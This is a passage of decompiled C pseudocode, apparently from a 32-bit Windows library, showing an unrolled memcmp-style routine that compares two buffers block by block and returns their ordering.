                                                                                                                					}
                                                                                                                					_t989 = (0 | _t1001 > 0x00000000) + (0 | _t1001 > 0x00000000) - 1;
                                                                                                                					if(_t989 != 0) {
                                                                                                                						goto L438;
                                                                                                                					}
                                                                                                                					goto L421;
                                                                                                                				} else {
                                                                                                                					_t1147 = _a8;
                                                                                                                					_t1006 = _a4;
                                                                                                                					_t1173 = 0x20;
                                                                                                                					while(_t1174 >= _t1173) {
                                                                                                                						if( *_t1006 ==  *_t1147) {
                                                                                                                							_t1175 = 0;
                                                                                                                							L16:
                                                                                                                							if(_t1175 != 0) {
                                                                                                                								L98:
                                                                                                                								_t1007 = _t1175;
                                                                                                                								L178:
                                                                                                                								return _t1007;
                                                                                                                							}
                                                                                                                							if(_t1006[4] == _t1147[4]) {
                                                                                                                								_t1175 = 0;
                                                                                                                								L27:
                                                                                                                								if(_t1175 != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								if(_t1006[8] == _t1147[8]) {
                                                                                                                									_t1175 = 0;
                                                                                                                									L38:
                                                                                                                									if(_t1175 != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									if(_t1006[0xc] == _t1147[0xc]) {
                                                                                                                										_t1175 = 0;
                                                                                                                										L49:
                                                                                                                										if(_t1175 != 0) {
                                                                                                                											goto L98;
                                                                                                                										}
                                                                                                                										if(_t1006[0x10] == _t1147[0x10]) {
                                                                                                                											_t1175 = 0;
                                                                                                                											L60:
                                                                                                                											if(_t1175 != 0) {
                                                                                                                												goto L98;
                                                                                                                											}
                                                                                                                											if(_t1006[0x14] == _t1147[0x14]) {
                                                                                                                												_t1175 = 0;
                                                                                                                												L71:
                                                                                                                												if(_t1175 != 0) {
                                                                                                                													goto L98;
                                                                                                                												}
                                                                                                                												if(_t1006[0x18] == _t1147[0x18]) {
                                                                                                                													_t1175 = 0;
                                                                                                                													L82:
                                                                                                                													if(_t1175 != 0) {
                                                                                                                														goto L98;
                                                                                                                													}
                                                                                                                													if(_t1006[0x1c] == _t1147[0x1c]) {
                                                                                                                														_t1175 = 0;
                                                                                                                														L93:
                                                                                                                														if(_t1175 != 0) {
                                                                                                                															goto L98;
                                                                                                                														} else {
                                                                                                                															_t1006 =  &(_t1006[_t1173]);
                                                                                                                															_t1147 =  &(_t1147[_t1173]);
                                                                                                                															_t1174 = _t1174 - _t1173;
                                                                                                                															continue;
                                                                                                                														}
                                                                                                                													}
                                                                                                                													_t1188 = (_t1006[0x1c] & 0x000000ff) - (_t1147[0x1c] & 0x000000ff);
                                                                                                                													if(_t1188 == 0) {
                                                                                                                														L86:
                                                                                                                														_t1190 = (_t1006[0x1d] & 0x000000ff) - (_t1147[0x1d] & 0x000000ff);
                                                                                                                														if(_t1190 == 0) {
                                                                                                                															L88:
                                                                                                                															_t1192 = (_t1006[0x1e] & 0x000000ff) - (_t1147[0x1e] & 0x000000ff);
                                                                                                                															if(_t1192 == 0) {
                                                                                                                																L90:
                                                                                                                																_t1175 = (_t1006[0x1f] & 0x000000ff) - (_t1147[0x1f] & 0x000000ff);
                                                                                                                																if(_t1175 != 0) {
                                                                                                                																	_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                                                                                                                																}
                                                                                                                																goto L93;
                                                                                                                															}
                                                                                                                															_t1175 = (0 | _t1192 > 0x00000000) + (0 | _t1192 > 0x00000000) - 1;
                                                                                                                															if(_t1175 != 0) {
                                                                                                                																goto L98;
                                                                                                                															}
                                                                                                                															goto L90;
                                                                                                                														}
                                                                                                                														_t1175 = (0 | _t1190 > 0x00000000) + (0 | _t1190 > 0x00000000) - 1;
                                                                                                                														if(_t1175 != 0) {
                                                                                                                															goto L98;
                                                                                                                														}
                                                                                                                														goto L88;
                                                                                                                													}
                                                                                                                													_t1175 = (0 | _t1188 > 0x00000000) + (0 | _t1188 > 0x00000000) - 1;
                                                                                                                													if(_t1175 != 0) {
                                                                                                                														goto L98;
                                                                                                                													}
                                                                                                                													goto L86;
                                                                                                                												}
                                                                                                                												_t1195 = (_t1006[0x18] & 0x000000ff) - (_t1147[0x18] & 0x000000ff);
                                                                                                                												if(_t1195 == 0) {
                                                                                                                													L75:
                                                                                                                													_t1197 = (_t1006[0x19] & 0x000000ff) - (_t1147[0x19] & 0x000000ff);
                                                                                                                													if(_t1197 == 0) {
                                                                                                                														L77:
                                                                                                                														_t1199 = (_t1006[0x1a] & 0x000000ff) - (_t1147[0x1a] & 0x000000ff);
                                                                                                                														if(_t1199 == 0) {
                                                                                                                															L79:
                                                                                                                															_t1175 = (_t1006[0x1b] & 0x000000ff) - (_t1147[0x1b] & 0x000000ff);
                                                                                                                															if(_t1175 != 0) {
                                                                                                                																_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                                                                                                                															}
                                                                                                                															goto L82;
                                                                                                                														}
                                                                                                                														_t1175 = (0 | _t1199 > 0x00000000) + (0 | _t1199 > 0x00000000) - 1;
                                                                                                                														if(_t1175 != 0) {
                                                                                                                															goto L98;
                                                                                                                														}
                                                                                                                														goto L79;
                                                                                                                													}
                                                                                                                													_t1175 = (0 | _t1197 > 0x00000000) + (0 | _t1197 > 0x00000000) - 1;
                                                                                                                													if(_t1175 != 0) {
                                                                                                                														goto L98;
                                                                                                                													}
                                                                                                                													goto L77;
                                                                                                                												}
                                                                                                                												_t1175 = (0 | _t1195 > 0x00000000) + (0 | _t1195 > 0x00000000) - 1;
                                                                                                                												if(_t1175 != 0) {
                                                                                                                													goto L98;
                                                                                                                												}
                                                                                                                												goto L75;
                                                                                                                											}
                                                                                                                											_t1202 = (_t1006[0x14] & 0x000000ff) - (_t1147[0x14] & 0x000000ff);
                                                                                                                											if(_t1202 == 0) {
                                                                                                                												L64:
                                                                                                                												_t1204 = (_t1006[0x15] & 0x000000ff) - (_t1147[0x15] & 0x000000ff);
                                                                                                                												if(_t1204 == 0) {
                                                                                                                													L66:
                                                                                                                													_t1206 = (_t1006[0x16] & 0x000000ff) - (_t1147[0x16] & 0x000000ff);
                                                                                                                													if(_t1206 == 0) {
                                                                                                                														L68:
                                                                                                                														_t1175 = (_t1006[0x17] & 0x000000ff) - (_t1147[0x17] & 0x000000ff);
                                                                                                                														if(_t1175 != 0) {
                                                                                                                															_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                                                                                                                														}
                                                                                                                														goto L71;
                                                                                                                													}
                                                                                                                													_t1175 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
                                                                                                                													if(_t1175 != 0) {
                                                                                                                														goto L98;
                                                                                                                													}
                                                                                                                													goto L68;
                                                                                                                												}
                                                                                                                												_t1175 = (0 | _t1204 > 0x00000000) + (0 | _t1204 > 0x00000000) - 1;
                                                                                                                												if(_t1175 != 0) {
                                                                                                                													goto L98;
                                                                                                                												}
                                                                                                                												goto L66;
                                                                                                                											}
                                                                                                                											_t1175 = (0 | _t1202 > 0x00000000) + (0 | _t1202 > 0x00000000) - 1;
                                                                                                                											if(_t1175 != 0) {
                                                                                                                												goto L98;
                                                                                                                											}
                                                                                                                											goto L64;
                                                                                                                										}
                                                                                                                										_t1209 = (_t1006[0x10] & 0x000000ff) - (_t1147[0x10] & 0x000000ff);
                                                                                                                										if(_t1209 == 0) {
                                                                                                                											L53:
                                                                                                                											_t1211 = (_t1006[0x11] & 0x000000ff) - (_t1147[0x11] & 0x000000ff);
                                                                                                                											if(_t1211 == 0) {
                                                                                                                												L55:
                                                                                                                												_t1213 = (_t1006[0x12] & 0x000000ff) - (_t1147[0x12] & 0x000000ff);
                                                                                                                												if(_t1213 == 0) {
                                                                                                                													L57:
                                                                                                                													_t1175 = (_t1006[0x13] & 0x000000ff) - (_t1147[0x13] & 0x000000ff);
                                                                                                                													if(_t1175 != 0) {
                                                                                                                														_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													goto L60;
                                                                                                                												}
                                                                                                                												_t1175 = (0 | _t1213 > 0x00000000) + (0 | _t1213 > 0x00000000) - 1;
                                                                                                                												if(_t1175 != 0) {
                                                                                                                													goto L98;
                                                                                                                												}
                                                                                                                												goto L57;
                                                                                                                											}
                                                                                                                											_t1175 = (0 | _t1211 > 0x00000000) + (0 | _t1211 > 0x00000000) - 1;
                                                                                                                											if(_t1175 != 0) {
                                                                                                                												goto L98;
                                                                                                                											}
                                                                                                                											goto L55;
                                                                                                                										}
                                                                                                                										_t1175 = (0 | _t1209 > 0x00000000) + (0 | _t1209 > 0x00000000) - 1;
                                                                                                                										if(_t1175 != 0) {
                                                                                                                											goto L98;
                                                                                                                										}
                                                                                                                										goto L53;
                                                                                                                									}
                                                                                                                									_t1216 = (_t1006[0xc] & 0x000000ff) - (_t1147[0xc] & 0x000000ff);
                                                                                                                									if(_t1216 == 0) {
                                                                                                                										L42:
                                                                                                                										_t1218 = (_t1006[0xd] & 0x000000ff) - (_t1147[0xd] & 0x000000ff);
                                                                                                                										if(_t1218 == 0) {
                                                                                                                											L44:
                                                                                                                											_t1220 = (_t1006[0xe] & 0x000000ff) - (_t1147[0xe] & 0x000000ff);
                                                                                                                											if(_t1220 == 0) {
                                                                                                                												L46:
                                                                                                                												_t1175 = (_t1006[0xf] & 0x000000ff) - (_t1147[0xf] & 0x000000ff);
                                                                                                                												if(_t1175 != 0) {
                                                                                                                													_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L49;
                                                                                                                											}
                                                                                                                											_t1175 = (0 | _t1220 > 0x00000000) + (0 | _t1220 > 0x00000000) - 1;
                                                                                                                											if(_t1175 != 0) {
                                                                                                                												goto L98;
                                                                                                                											}
                                                                                                                											goto L46;
                                                                                                                										}
                                                                                                                										_t1175 = (0 | _t1218 > 0x00000000) + (0 | _t1218 > 0x00000000) - 1;
                                                                                                                										if(_t1175 != 0) {
                                                                                                                											goto L98;
                                                                                                                										}
                                                                                                                										goto L44;
                                                                                                                									}
                                                                                                                									_t1175 = (0 | _t1216 > 0x00000000) + (0 | _t1216 > 0x00000000) - 1;
                                                                                                                									if(_t1175 != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L42;
                                                                                                                								}
                                                                                                                								_t1223 = (_t1006[8] & 0x000000ff) - (_t1147[8] & 0x000000ff);
                                                                                                                								if(_t1223 == 0) {
                                                                                                                									L31:
                                                                                                                									_t1225 = (_t1006[9] & 0x000000ff) - (_t1147[9] & 0x000000ff);
                                                                                                                									if(_t1225 == 0) {
                                                                                                                										L33:
                                                                                                                										_t1227 = (_t1006[0xa] & 0x000000ff) - (_t1147[0xa] & 0x000000ff);
                                                                                                                										if(_t1227 == 0) {
                                                                                                                											L35:
                                                                                                                											_t1175 = (_t1006[0xb] & 0x000000ff) - (_t1147[0xb] & 0x000000ff);
                                                                                                                											if(_t1175 != 0) {
                                                                                                                												_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											goto L38;
                                                                                                                										}
                                                                                                                										_t1175 = (0 | _t1227 > 0x00000000) + (0 | _t1227 > 0x00000000) - 1;
                                                                                                                										if(_t1175 != 0) {
                                                                                                                											goto L98;
                                                                                                                										}
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									_t1175 = (0 | _t1225 > 0x00000000) + (0 | _t1225 > 0x00000000) - 1;
                                                                                                                									if(_t1175 != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L33;
                                                                                                                								}
                                                                                                                								_t1175 = (0 | _t1223 > 0x00000000) + (0 | _t1223 > 0x00000000) - 1;
                                                                                                                								if(_t1175 != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L31;
                                                                                                                							}
                                                                                                                							_t1230 = (_t1006[4] & 0x000000ff) - (_t1147[4] & 0x000000ff);
                                                                                                                							if(_t1230 == 0) {
                                                                                                                								L20:
                                                                                                                								_t1232 = (_t1006[5] & 0x000000ff) - (_t1147[5] & 0x000000ff);
                                                                                                                								if(_t1232 == 0) {
                                                                                                                									L22:
                                                                                                                									_t1234 = (_t1006[6] & 0x000000ff) - (_t1147[6] & 0x000000ff);
                                                                                                                									if(_t1234 == 0) {
                                                                                                                										L24:
                                                                                                                										_t1175 = (_t1006[7] & 0x000000ff) - (_t1147[7] & 0x000000ff);
                                                                                                                										if(_t1175 != 0) {
                                                                                                                											_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                                                                                                                										}
                                                                                                                										goto L27;
                                                                                                                									}
                                                                                                                									_t1175 = (0 | _t1234 > 0x00000000) + (0 | _t1234 > 0x00000000) - 1;
                                                                                                                									if(_t1175 != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L24;
                                                                                                                								}
                                                                                                                								_t1175 = (0 | _t1232 > 0x00000000) + (0 | _t1232 > 0x00000000) - 1;
                                                                                                                								if(_t1175 != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L22;
                                                                                                                							}
                                                                                                                							_t1175 = (0 | _t1230 > 0x00000000) + (0 | _t1230 > 0x00000000) - 1;
                                                                                                                							if(_t1175 != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L20;
                                                                                                                						}
                                                                                                                						_t1237 = ( *_t1006 & 0x000000ff) - ( *_t1147 & 0x000000ff);
                                                                                                                						if(_t1237 == 0) {
                                                                                                                							L9:
                                                                                                                							_t1239 = (_t1006[1] & 0x000000ff) - (_t1147[1] & 0x000000ff);
                                                                                                                							if(_t1239 == 0) {
                                                                                                                								L11:
                                                                                                                								_t1241 = (_t1006[2] & 0x000000ff) - (_t1147[2] & 0x000000ff);
                                                                                                                								if(_t1241 == 0) {
                                                                                                                									L13:
                                                                                                                									_t1175 = (_t1006[3] & 0x000000ff) - (_t1147[3] & 0x000000ff);
                                                                                                                									if(_t1175 != 0) {
                                                                                                                										_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                                                                                                                									}
                                                                                                                									goto L16;
                                                                                                                								}
                                                                                                                								_t1175 = (0 | _t1241 > 0x00000000) + (0 | _t1241 > 0x00000000) - 1;
                                                                                                                								if(_t1175 != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							_t1175 = (0 | _t1239 > 0x00000000) + (0 | _t1239 > 0x00000000) - 1;
                                                                                                                							if(_t1175 != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L11;
                                                                                                                						}
                                                                                                                						_t1175 = (0 | _t1237 > 0x00000000) + (0 | _t1237 > 0x00000000) - 1;
                                                                                                                						if(_t1175 != 0) {
                                                                                                                							goto L98;
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					if(_t1174 > 0x1f) {
                                                                                                                						L177:
                                                                                                                						_t1007 = 0;
                                                                                                                						goto L178;
                                                                                                                					}
                                                                                                                					switch( *((intOrPtr*)(_t1174 * 4 +  &M1004BDB7))) {
                                                                                                                						case 0:
                                                                                                                							goto L177;
                                                                                                                						case 1:
                                                                                                                							L256:
                                                                                                                							__ecx =  *(__ecx - 1) & 0x000000ff;
                                                                                                                							__eax =  *(__eax - 1) & 0x000000ff;
                                                                                                                							__eax = __eax - __ecx;
                                                                                                                							if(__eax != 0) {
                                                                                                                								0 = 0 | __eax > 0x00000000;
                                                                                                                								__ecx = (__eax > 0) + (__eax > 0) - 1;
                                                                                                                								__eax = (__eax > 0) + (__eax > 0) - 1;
                                                                                                                							}
                                                                                                                							goto L178;
                                                                                                                						case 2:
                                                                                                                							L335:
                                                                                                                							if( *(__eax - 2) ==  *(__ecx - 2)) {
                                                                                                                								goto L177;
                                                                                                                							}
                                                                                                                							goto L336;
                                                                                                                						case 3:
                                                                                                                							L416:
                                                                                                                							__esi =  *(__eax - 3) & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 3) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L336:
                                                                                                                								__edx =  *(__ecx - 2) & 0x000000ff;
                                                                                                                								__esi =  *(__eax - 2) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									goto L256;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								if(__edx != 0) {
                                                                                                                									L418:
                                                                                                                									__eax = __edx;
                                                                                                                									goto L178;
                                                                                                                								}
                                                                                                                								goto L256;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							if(__edx == 0) {
                                                                                                                								goto L336;
                                                                                                                							}
                                                                                                                							goto L418;
                                                                                                                						case 4:
                                                                                                                							L165:
                                                                                                                							__edx =  *(__eax - 4);
                                                                                                                							if( *(__eax - 4) ==  *(__ecx - 4)) {
                                                                                                                								__eax = 0;
                                                                                                                								L176:
                                                                                                                								if(__eax != 0) {
                                                                                                                									goto L178;
                                                                                                                								}
                                                                                                                								goto L177;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 4) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L168:
                                                                                                                								__esi =  *(__eax - 3) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 3) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L170:
                                                                                                                									__esi =  *(__eax - 2) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 2) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L173:
                                                                                                                										__eax =  *(__eax - 1) & 0x000000ff;
                                                                                                                										__eax = __eax - __ecx;
                                                                                                                										if(__eax != 0) {
                                                                                                                											0 = 0 | __eax > 0x00000000;
                                                                                                                											__ecx = (__eax > 0) + (__eax > 0) - 1;
                                                                                                                											__eax = (__eax > 0) + (__eax > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L176;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									if(__edx == 0) {
                                                                                                                										goto L173;
                                                                                                                									}
                                                                                                                									L172:
                                                                                                                									__eax = __edx;
                                                                                                                									goto L176;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L172;
                                                                                                                								}
                                                                                                                								goto L170;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L172;
                                                                                                                							}
                                                                                                                							goto L168;
                                                                                                                						case 5:
                                                                                                                							L245:
                                                                                                                							__edx =  *(__eax - 5);
                                                                                                                							if( *(__eax - 5) ==  *(__ecx - 5)) {
                                                                                                                								__esi = 0;
                                                                                                                								L255:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L256;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 5) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L248:
                                                                                                                								__esi =  *(__eax - 4) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 4) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L250:
                                                                                                                									__esi =  *(__eax - 3) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 3) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L252:
                                                                                                                										__esi =  *(__eax - 2) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 2) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L255;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L252;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L250;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L248;
                                                                                                                						case 6:
                                                                                                                							L324:
                                                                                                                							__edx =  *(__eax - 6);
                                                                                                                							if( *(__eax - 6) ==  *(__ecx - 6)) {
                                                                                                                								__esi = 0;
                                                                                                                								L334:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L335;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 6) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L327:
                                                                                                                								__esi =  *(__eax - 5) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 5) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L329:
                                                                                                                									__esi =  *(__eax - 4) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 4) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L331:
                                                                                                                										__esi =  *(__eax - 3) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 3) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L334;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L331;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L329;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L327;
                                                                                                                						case 7:
                                                                                                                							L405:
                                                                                                                							__edx =  *(__eax - 7);
                                                                                                                							if( *(__eax - 7) ==  *(__ecx - 7)) {
                                                                                                                								__esi = 0;
                                                                                                                								L415:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L416;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 7) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L408:
                                                                                                                								__esi =  *(__eax - 6) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 6) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L410:
                                                                                                                									__esi =  *(__eax - 5) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 5) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L412:
                                                                                                                										__esi =  *(__eax - 4) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 4) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L415;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L412;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L410;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L98;
                                                                                                                							}
                                                                                                                							goto L408;
                                                                                                                						case 8:
                                                                                                                							L154:
                                                                                                                							__edx =  *(__eax - 8);
                                                                                                                							if( *(__eax - 8) ==  *(__ecx - 8)) {
                                                                                                                								__esi = 0;
                                                                                                                								L164:
                                                                                                                								if(__esi != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L165;
                                                                                                                							}
                                                                                                                							__esi = __dl & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 8) & 0x000000ff;
                                                                                                                							__esi = (__dl & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L157:
                                                                                                                								__esi =  *(__eax - 7) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 7) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                                                                                                                								if(__esi == 0) {
                                                                                                                									L159:
                                                                                                                									__esi =  *(__eax - 6) & 0x000000ff;
                                                                                                                									__edx =  *(__ecx - 6) & 0x000000ff;
                                                                                                                									__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                                                                                                                									if(__esi == 0) {
                                                                                                                										L161:
                                                                                                                										__esi =  *(__eax - 5) & 0x000000ff;
                                                                                                                										__edx =  *(__ecx - 5) & 0x000000ff;
                                                                                                                										__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                                                                                                                										if(__esi != 0) {
                                                                                                                											0 = 0 | __esi > 0x00000000;
                                                                                                                											__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                											__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                										}
                                                                                                                										goto L164;
                                                                                                                									}
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = __edx;
                                                                                                                									if(__edx != 0) {
                                                                                                                										goto L98;
                                                                                                                									}
                                                                                                                									goto L161;
                                                                                                                								}
                                                                                                                								0 = 0 | __esi > 0x00000000;
                                                                                                                								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								__esi = __edx;
                                                                                                                								if(__edx != 0) {
                                                                                                                									goto L98;
                                                                                                                								}
                                                                                                                								goto L159;
                                                                                                                							}
